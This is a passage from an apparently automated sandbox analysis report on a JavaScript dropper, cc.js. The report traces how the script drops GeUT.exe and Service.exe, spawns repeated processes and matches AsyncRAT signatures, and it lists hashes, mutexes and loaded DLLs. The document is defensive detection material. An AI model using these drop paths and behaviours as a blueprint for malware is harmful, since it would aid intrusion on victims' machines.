              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 15_2_012313B815_2_012313B8
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 16_2_014213B816_2_014213B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 17_2_0273520817_2_02735208
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 17_2_0273728817_2_02737288
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 17_2_027343D017_2_027343D0
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 17_2_0273645017_2_02736450
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 17_2_02730D3317_2_02730D33
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 17_2_0273727C17_2_0273727C
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 17_2_0273608017_2_02736080
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 17_2_027361C817_2_027361C8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 19_2_017513B819_2_017513B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 21_2_030613B821_2_030613B8
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeCode function: 22_2_012F13B822_2_012F13B8
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 24_2_00B961BC24_2_00B961BC
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 24_2_00B9520824_2_00B95208
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 24_2_00B9727924_2_00B97279
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 24_2_00B943D024_2_00B943D0
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 24_2_00B90D3224_2_00B90D32
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 25_2_04B413B825_2_04B413B8
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 26_2_02DC13B826_2_02DC13B8
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 27_2_00CE13B827_2_00CE13B8
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 28_2_012213B828_2_012213B8
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 29_2_016513B829_2_016513B8
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\GeUT.exe 680ED672969AC8F7D533B74B27B152F4608EF9BBA02F48935829455190B1E996
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Service.exe 680ED672969AC8F7D533B74B27B152F4608EF9BBA02F48935829455190B1E996
              Source: cc.jsInitial sample: Strings found which are bigger than 50
              Source: 5.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 2.2.GeUT.exe.28363bc.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 2.2.GeUT.exe.2838018.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 2.2.GeUT.exe.2834784.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 4.2.GeUT.exe.3376aa4.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 4.2.GeUT.exe.3374e60.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 11.2.Service.exe.28d801c.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 4.2.GeUT.exe.3378700.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 11.2.Service.exe.28d4788.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 11.2.Service.exe.28d63c0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000005.00000002.2282391567.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000004.00000002.2255004351.0000000003359000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000002.00000002.2147849334.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000B.00000002.2338909006.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: GeUT.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Service.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: GeUT.exe.0.dr, Program.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.3.wscript.exe.26357946390.0.raw.unpack, Program.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.wscript.exe.263586370e0.0.raw.unpack, Program.csCryptographic APIs: 'CreateDecryptor'
              Source: Service.exe.2.dr, Program.csCryptographic APIs: 'CreateDecryptor'
              Source: classification engineClassification label: mal100.troj.evad.winJS@49/5@3/0
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeFile created: C:\Users\user\AppData\Roaming\Service.exeJump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeMutant created: NULL
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMutant created: \Sessions\1\BaseNamedObjects\wtYmVE2WY2XGhWlO
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\GeUT.exeJump to behavior
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: cc.jsReversingLabs: Detection: 39%
              Source: cc.jsVirustotal: Detection: 31%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\cc.js"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeProcess created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
